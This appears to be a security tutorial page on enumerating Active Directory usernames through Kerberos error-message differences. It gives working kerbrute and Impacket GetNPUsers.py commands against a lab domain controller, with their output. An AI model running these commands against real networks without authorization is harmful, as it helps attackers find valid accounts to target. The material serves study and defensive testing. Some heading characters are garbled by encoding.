π€ User Enumeration β
Kerberos, while secure, can be susceptible to user enumeration attacks. User enumeration is a technique used by attackers to gather a list of valid usernames in a network. By leveraging specific behaviors of the Kerberos protocol, attackers can determine whether a username exists within an Active Directory (AD) environment.
β How User Enumeration via Kerberos Works β
Differences in Kerberos Error Messages β
Kerberos user enumeration exploits the difference in error messages returned by the Key Distribution Center (KDC) when authenticating with valid versus invalid usernames. When an authentication request is sent to the KDC :
- If the username is
valid, the KDC responds with a pre-authentication required error (KDC_ERR_PREAUTH_REQUIRED). - If the username is
invalid, the KDC responds with a principal unknown error (KDC_ERR_C_PRINCIPAL_UNKNOWN).
πͺ Tools & Examples β
Kerbrute β
Kerbrute is a popular tool for enumerating users via Kerberos. It sends authentication requests to the KDC and analyzes the responses to determine valid usernames.
bash
kerbrute userenum --dc '192.168.10.10' -d "red.lab" usernames.txtbash
Version: dev (n/a) - 07/16/24 - Ronnie Flathers @ropnop
2024/07/16 15:50:39 > Using KDC(s):
2024/07/16 15:50:39 > 192.168.10.10:88
2024/07/16 15:50:39 > [+] VALID USERNAME: qu35t@red.lab
2024/07/16 15:50:39 > Done! Tested 14 usernames (1 valid) in 0.060 secondsGetNPUsers.py β
bash
GetNPUsers.py -dc-ip 192.168.10.10 red.lab/ -usersfile usernames.txtbash
Impacket for Exegol - v0.10.1.dev1+20240403.124027.3e5f85b - Copyright 2022 Fortra - forked by ThePorgs
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User qu35t doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)